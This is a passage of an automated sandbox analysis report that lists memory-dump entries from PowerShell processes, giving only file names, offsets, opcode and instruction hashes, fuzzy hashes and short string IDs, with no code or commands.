                                                                                                        • Instruction ID: a0c2e68eacb3044e236afd8860c15bc00bf12b538a70980a0dcf6f790a0eafc3
                                                                                                        • Opcode Fuzzy Hash: b97e02377cf304a997ff4b3dfa74e19cf59a122f1d453d45a10fea54f56bd52f
                                                                                                        • Instruction Fuzzy Hash: 35C08CA0906A8219FB20C300A7003B439C18B85388E808098824C20624AA3DA2816506
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085810542.00007FFD997D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd997d0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !$ !$ !$ !$L_H
                                                                                                        • API String ID: 0-2509613107
                                                                                                        • Opcode ID: bd902a1d4641054ad4f34a8d8912736ecc4f05e6cefb4210f0dc90a87b4f71d9
                                                                                                        • Instruction ID: 64860da23193fe47a31f7932d128ad4aeac113532b85e4f835eb81cf0fbbeeb2
                                                                                                        • Opcode Fuzzy Hash: bd902a1d4641054ad4f34a8d8912736ecc4f05e6cefb4210f0dc90a87b4f71d9
                                                                                                        • Instruction Fuzzy Hash: 24B22A22B0DBC90FE7669B6898655B43BE1DF56258B0902FBD08DC71D3DD19AC0AC362
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c4b2f33744e61be63c058fc84b452e43e8123bb1a4633b75c24221905ba6b3b
                                                                                                        • Instruction ID: 720ebf4c764d1cf709841b9f93aa196ac955796f739e47e0fc7938d47c1ba2c4
                                                                                                        • Opcode Fuzzy Hash: 0c4b2f33744e61be63c058fc84b452e43e8123bb1a4633b75c24221905ba6b3b
                                                                                                        • Instruction Fuzzy Hash: A1710F63B099DB0FD751AFACDC761E53750EF512ADB0800B6D5AC8B093FD15242A4787
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4addad6b093fa89f7aae8706677c63fb9ebe1501aa7f5880a629d6b45f1f805
                                                                                                        • Instruction ID: f4a9a468714c0ef4f0465687c4d11bc44bcbeff41d53b4b8f5efc458c7a38047
                                                                                                        • Opcode Fuzzy Hash: f4addad6b093fa89f7aae8706677c63fb9ebe1501aa7f5880a629d6b45f1f805
                                                                                                        • Instruction Fuzzy Hash: 4441F772A0CA484FDB689F5C98566B9BBE0FB95311F40416FE44983292DF70B855CBC3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7679f547087a6f54bb3eba7ecc0a1eba256b5fd6cc40ff52efa7f31ff1596d5d
                                                                                                        • Instruction ID: 0cf2f810e0bd89dbf1c249741fbcab4bfe7d4e61ee148ae5ffb5e2ff3aac286a
                                                                                                        • Opcode Fuzzy Hash: 7679f547087a6f54bb3eba7ecc0a1eba256b5fd6cc40ff52efa7f31ff1596d5d
                                                                                                        • Instruction Fuzzy Hash: C021F83190C74C4FEB59DFAC984A7E97FF0EB9A321F04416BD048C3156DA74A45ACB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085810542.00007FFD997D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd997d0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 02c754d1830ea5b2c2f0c58baaf5c4083c9f460233fab414cb0b5a54eae900d4
                                                                                                        • Instruction ID: a81f55281acfc1aacfe54d65b163ee3ba53826e04b4b5c89f6c81ba0227e3f11
                                                                                                        • Opcode Fuzzy Hash: 02c754d1830ea5b2c2f0c58baaf5c4083c9f460233fab414cb0b5a54eae900d4
                                                                                                        • Instruction Fuzzy Hash: 6E21F222F0DA8B5FE7B5CE58C4A157473D2EF69298B5902BAC05DC71E2CE19EC088343
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085810542.00007FFD997D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd997d0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8ee452bdbe17a4397964f78c09235f5f69ba47f211bc8e470d0568779710329
                                                                                                        • Instruction ID: cd66f11284576e4132961bc88945e25bb61015b7ab0807c85be3bd164c6cd731
                                                                                                        • Opcode Fuzzy Hash: e8ee452bdbe17a4397964f78c09235f5f69ba47f211bc8e470d0568779710329
                                                                                                        • Instruction Fuzzy Hash: A8110232F0E6854FE7B4DE9CC4A49B877D1EF49268B4802BAD05DC70D3DE19AC588342
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085810542.00007FFD997D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd997d0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ee33ee1d0233370db9881b1682b3982c6c92d2e107ba3404f3686122804a927
                                                                                                        • Instruction ID: 25e1eb2b8fc818639693a0f71caf9a14052c498696163798589e69e5777aa068
                                                                                                        • Opcode Fuzzy Hash: 6ee33ee1d0233370db9881b1682b3982c6c92d2e107ba3404f3686122804a927
                                                                                                        • Instruction Fuzzy Hash: 5A113632F0D6898FE7A5DF9894A42A877D1EF5835CF0841BEC44CC7087DD24A849C316
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                        • Instruction ID: 58d28adbbb7b9f41fb01527e06986e050b27d092dcb3c2bcc9b1f4c4d718ad06
                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                        • Instruction Fuzzy Hash: 5601677121CB0D4FD748EF0CE451AA5B7E0FB95364F10056EE58AC3695DA36E882CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2796e73ac43662365c34d0188ad408fe790dc330d80c9952eddf324bc0995756
                                                                                                        • Instruction ID: ddd32594cfe251f35049fa8da1aeb971f2b0a79972d1049e58ba3efe22d53051
                                                                                                        • Opcode Fuzzy Hash: 2796e73ac43662365c34d0188ad408fe790dc330d80c9952eddf324bc0995756
                                                                                                        • Instruction Fuzzy Hash: B0F0827250CB0D4FEB54DF4CE4925A577D0EB55234F00022EE58AC7192DA23A493C746
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.2085109178.00007FFD99700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_18_2_7ffd99700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                        • API String ID: 0-3508309026
                                                                                                        • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                        • Instruction ID: bce30e2fb04988ca3e9f822e5d420ab87e77341ec2a6ee8e4356d2f0d1fa2f32
                                                                                                        • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                        • Instruction Fuzzy Hash: 9621F6B7B085665ED3017BFDFC249DA3B40DF9427478502B2D3A8DB583EE14708A8AD6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214727745.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 805eacd5dfc5f2f2bf20224e243dc7aa79a806a712047332b0ae5b0ccd840563
                                                                                                        • Instruction ID: 3745d886b81b028e2cedf31341aa05e833125b8236acea34658287235d50aa22
                                                                                                        • Opcode Fuzzy Hash: 805eacd5dfc5f2f2bf20224e243dc7aa79a806a712047332b0ae5b0ccd840563
                                                                                                        • Instruction Fuzzy Hash: 40511822B0CA8A4FEBB9DE9C846167477D2DF99364F5801BEC15DC71A7DD24EC058342
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214727745.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b1b421121bd3e0e6af2963ee85849d03013a34ea5b8f3638a60a9929bbf03d45
                                                                                                        • Instruction ID: 12704f3f7eee8086b1469ed0db8733fb48861fb9a5229e12e1e87e33cc14356d
                                                                                                        • Opcode Fuzzy Hash: b1b421121bd3e0e6af2963ee85849d03013a34ea5b8f3638a60a9929bbf03d45
                                                                                                        • Instruction Fuzzy Hash: 34412932B0DA494FE7B6DE9C94615B477D1EF89368B4801FAC05DC7197ED18EC158342
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214015710.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5f961d6ccba2434d65f587f5322f2b1f3a2f2e1e5676655917bdbf9e8a515666
                                                                                                        • Instruction ID: 8321e3cdf7a89bc3773f2907ada0b1780e77947bc79623a446df12dbe5fac7d4
                                                                                                        • Opcode Fuzzy Hash: 5f961d6ccba2434d65f587f5322f2b1f3a2f2e1e5676655917bdbf9e8a515666
                                                                                                        • Instruction Fuzzy Hash: 7541F57190DB884FDB29DF5C981A6A97FF0FB95315F0441AFE08983193CA64A856CBC3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214015710.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 26d190ed52b0ce72ade09fe8c3cfb6589ff063e48b25d906d17dd468fa9eb250
                                                                                                        • Instruction ID: f554a773679cdcc6837ffe649fa9e23cb123ea84221be6049fd3b89aa52e9e65
                                                                                                        • Opcode Fuzzy Hash: 26d190ed52b0ce72ade09fe8c3cfb6589ff063e48b25d906d17dd468fa9eb250
                                                                                                        • Instruction Fuzzy Hash: 4C21063190CB8C4FDB59DFAC984A7E97BE0EB96320F04416BD448C3156DA74A806CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214727745.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d59fb046ddf9b30d667a06063547ddafd3afbd46006e263e9444fcd85f5e070d
                                                                                                        • Instruction ID: 5cbd472cd0f774eb79c835c5b572577416a0371b9b7f093e7c1ee9cf263d4a80
                                                                                                        • Opcode Fuzzy Hash: d59fb046ddf9b30d667a06063547ddafd3afbd46006e263e9444fcd85f5e070d
                                                                                                        • Instruction Fuzzy Hash: AA21D522F0DA8B4FEBB5CE9C446157477D2EF69298B5900BAC05DC71B2CD28EC048343
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214727745.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8d0431237d93b032a23680008477d1bb49505925c516b1fb83dad92c968c8fcf
                                                                                                        • Instruction ID: 00c67525e577c18b75285d3a4a91c1b1eb78057ec39d1bb8f9cc61ba7b9537e1
                                                                                                        • Opcode Fuzzy Hash: 8d0431237d93b032a23680008477d1bb49505925c516b1fb83dad92c968c8fcf
                                                                                                        • Instruction Fuzzy Hash: A9110232F0E6854FE7B5DE9884A49B877D1EF49268B5800BAD01DC70A3DD19AC108342
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214727745.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cf062c68e242ec39f32fb535a3767528dd86d4f409a3206c8fb379a032852076
                                                                                                        • Instruction ID: daa88b6d51ed0fe01fb266caedb1a8f73eec432693db59550d916ffacd6c8b04
                                                                                                        • Opcode Fuzzy Hash: cf062c68e242ec39f32fb535a3767528dd86d4f409a3206c8fb379a032852076
                                                                                                        • Instruction Fuzzy Hash: 27112322F0D68D8FE7A5DED894A42A87BD1EF58358F0840BEC44CC7097DD249C45C316
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2213329180.00007FFD995FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD995FD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd995fd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: add3bee2f5f108e9e28091d3f0a6fd93ebc7efc53fee3d509aeea11d21a34cfc
                                                                                                        • Instruction ID: 07cb96695d1abde98600f2738d42e44d0e28677d0a030ffaf05603c60d247f2e
                                                                                                        • Opcode Fuzzy Hash: add3bee2f5f108e9e28091d3f0a6fd93ebc7efc53fee3d509aeea11d21a34cfc
                                                                                                        • Instruction Fuzzy Hash: 2101D43160CF088FD669EE6DE085D5677D1FB5832470045AED019CB555D621E886CB82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214015710.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction ID: c97a4751436304c209f8db3b26a9db522d08ff2f4c8e1e51ec575843d062f76e
                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction Fuzzy Hash: E201A73021CB0C4FDB48EF0CE051AA5B3E0FB85364F10052EE58AC3691DA32E882CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214015710.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2be8ab6d25c99a07ffeec14eb86c6beaff5d973f171efeb9cc4100ce89bb8303
                                                                                                        • Instruction ID: baf985209868c5ecd8a895c3e418037dc693a661263cbdd9a2803cafa510723c
                                                                                                        • Opcode Fuzzy Hash: 2be8ab6d25c99a07ffeec14eb86c6beaff5d973f171efeb9cc4100ce89bb8303
                                                                                                        • Instruction Fuzzy Hash: 4FF0FC76B4AA8C4FDB55DF2C9C650E47BA0EF65245B0502B7D048C71B2DE219819C7C2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2213329180.00007FFD995FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD995FD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd995fd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                        • Instruction ID: 93140ed0c6b900c26b51cff1709c4f6901ff4380342e7e1b859039acccc74baa
                                                                                                        • Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                        • Instruction Fuzzy Hash: 58F0DA30618E089FCBA5EF2DC485E1237E1FBA83147114658E45EC7669D734F891CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000015.00000002.2214015710.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_21_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                                        • API String ID: 0-962139525
                                                                                                        • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                                                        • Instruction ID: 92733911f586614356e92b8aa2366fa3b58d442658610b8bd6e4abbbea24181a
                                                                                                        • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                                                        • Instruction Fuzzy Hash: E121D7737045568AD30137ACB8519DD7780DF543793C603F3E128DF193EE1864878A86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99718000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99718000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99718000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ed22c5ca0f288f3e94ff9e4bdba070e84e59d00a8895474b2d015c047df7931
                                                                                                        • Instruction ID: 4a332680a3d94e99ff6ffd4465fb701fba2eeb21ac3aa0dff5fc6b3af8069896
                                                                                                        • Opcode Fuzzy Hash: 0ed22c5ca0f288f3e94ff9e4bdba070e84e59d00a8895474b2d015c047df7931
                                                                                                        • Instruction Fuzzy Hash: 2D81F073B09A9B0FD7229F6CE8B61F53750EF5125DB4C02B2D4988B0E3FD1564174686
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99718000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99718000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99718000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4715ac96e4faa426d8ce2ea67afc2aeae096a7374c3960615e82388527a2dac1
                                                                                                        • Instruction ID: 53c8635adc9e247685664e5afdabb47fa3b880aed0b4c15e575ac9211da6bfa5
                                                                                                        • Opcode Fuzzy Hash: 4715ac96e4faa426d8ce2ea67afc2aeae096a7374c3960615e82388527a2dac1
                                                                                                        • Instruction Fuzzy Hash: C3411B71A0CA484FDB699F5CA8566B9BBE0FF95315F10412FE459C3292DE30A816C7C3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2385187454.00007FFD995FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD995FD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd995fd000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8aaa63616dc977af8e6425c3afb55b5f788fca159e0d3c2a88ef7c54eef6b40d
                                                                                                        • Instruction ID: 3f1aff014c1ac365518b78f0df1e237df100a0299218eefbbe7804961b97d99d
                                                                                                        • Opcode Fuzzy Hash: 8aaa63616dc977af8e6425c3afb55b5f788fca159e0d3c2a88ef7c54eef6b40d
                                                                                                        • Instruction Fuzzy Hash: 2641467160EBC44FD7A78F289851A533FB0EF66324B0505EFD089CB1A7D625A80AC793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99718000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99718000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99718000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d059264c654ec010ae011b96f4b326528894af0bd2e2a819c621525c5437a5fb
                                                                                                        • Instruction ID: a9027b85814ecf9012ab3c1209337b3724facd0ce0ad614671ace23ca40ae8c0
                                                                                                        • Opcode Fuzzy Hash: d059264c654ec010ae011b96f4b326528894af0bd2e2a819c621525c5437a5fb
                                                                                                        • Instruction Fuzzy Hash: DC212B3090C74C8FDB59DFAC984A7E97FE0EB56320F04416BD048C7152DA749416CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2387549016.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cf062c68e242ec39f32fb535a3767528dd86d4f409a3206c8fb379a032852076
                                                                                                        • Instruction ID: daa88b6d51ed0fe01fb266caedb1a8f73eec432693db59550d916ffacd6c8b04
                                                                                                        • Opcode Fuzzy Hash: cf062c68e242ec39f32fb535a3767528dd86d4f409a3206c8fb379a032852076
                                                                                                        • Instruction Fuzzy Hash: 27112322F0D68D8FE7A5DED894A42A87BD1EF58358F0840BEC44CC7097DD249C45C316
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99710000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99710000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction ID: c97a4751436304c209f8db3b26a9db522d08ff2f4c8e1e51ec575843d062f76e
                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction Fuzzy Hash: E201A73021CB0C4FDB48EF0CE051AA5B3E0FB85364F10052EE58AC3691DA32E882CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2387549016.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8ba7029552209d8d6ebe9355902d4658995914bc309f1d49a8f9ffb05c12d7ba
                                                                                                        • Instruction ID: dc43c351d6aa6562516e23c5362015b505b328dcaeaddec30071c0349a8ebc70
                                                                                                        • Opcode Fuzzy Hash: 8ba7029552209d8d6ebe9355902d4658995914bc309f1d49a8f9ffb05c12d7ba
                                                                                                        • Instruction Fuzzy Hash: C0F09A32B0C5048FDB68EE8CE4518A873E0EF5836871500BAE16DC71A7CE29EC808742
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2387549016.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
